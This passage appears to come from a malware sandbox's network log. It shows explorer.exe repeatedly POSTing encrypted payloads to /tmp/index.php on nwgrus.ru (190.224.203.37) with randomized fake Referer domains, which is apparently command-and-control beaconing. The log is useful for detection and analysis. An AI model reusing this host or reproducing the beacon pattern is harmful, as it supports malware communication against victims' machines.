                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.549836190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:36.206881046 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://fkvpkdvartxwe.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 304
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:36.206906080 CEST304OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 5d 1c dc bc
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu]~af@58#[R6y%-ggSZgv+#(P? OqF}=uO19OC@>wydrmFD
                                                                                          Oct 3, 2024 23:27:37.768666029 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:37 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.549847190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:37.781622887 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://hqcqhgjcmtgx.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 211
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:37.781686068 CEST211OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 20 58 e9 ab
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu X\Atgu8LD!?w7IewGH%Y3&}vzXR|oU=Dz025A\Hr
                                                                                          Oct 3, 2024 23:27:39.167846918 CEST137INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:38 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.549857190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:39.176706076 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://uwtleoojxrcvopte.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 310
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:39.176717997 CEST310OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 32 5a f9 94
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu2Z\JLpPy?8?rpx?n.Z]S3W"CBB6s5BVx1~i!,Y%c:%b*['
                                                                                          Oct 3, 2024 23:27:40.552094936 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:40 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.549866190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:40.648149967 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://puvaafsthshrcum.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 339
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:40.648235083 CEST339OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 51 51 ca e4
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuQQS!Prk'a^F]ZgvS7";/M#iveqtA/$"\-c36@eVoF%8oG& $
                                                                                          Oct 3, 2024 23:27:42.029459953 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:41 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.549875190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:42.038116932 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://dvyvdbiqyxa.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 286
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:42.038132906 CEST286OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 43 2a d5 e8
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuC*2ltdFwA`2L\-i%P\>voU[yVq&!io[=+>~][P)v!NJN||\o:@A7
                                                                                          Oct 3, 2024 23:27:43.406652927 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:43 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.549886190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:43.415940046 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://vjfbbnssutajqo.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 356
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:43.415977955 CEST356OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5b 2c a8 a2
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu[,Q3OXstZY_wBHEsb\1NEC?MAL5-v%H*BF+1#\G/AgUhhyL/F
                                                                                          Oct 3, 2024 23:27:44.840760946 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:44 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.549896190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:44.850295067 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://icltdtwcxuda.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 242
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:44.850308895 CEST242OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7b 08 d3 85
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu{5kLv4}({u1YZd]i$"Jr%SR7L`[B+|M(4UO)$s-@QUK6s(X>:ADCI\
                                                                                          Oct 3, 2024 23:27:46.505533934 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:46 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.549905190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:46.515476942 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://hxmpwtofksapy.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 355
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:46.515476942 CEST355OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3f 04 a1 eb
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu?YRNgm3bWwx1n97YKHR<0"8sUN]"ZLBcdHJ).Js@z`CW-ZDu<4
                                                                                          Oct 3, 2024 23:27:47.944294930 CEST137INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:47 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.549915190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:47.954691887 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://prhupsyenaon.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 322
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:47.954725027 CEST322OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 63 36 b7 be
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuc6RQXRKJtI9k0^U3qBAN$/)NTE.f2P^(S#tu#%."_q i;Anb I2
                                                                                          Oct 3, 2024 23:27:49.340656996 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:49 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
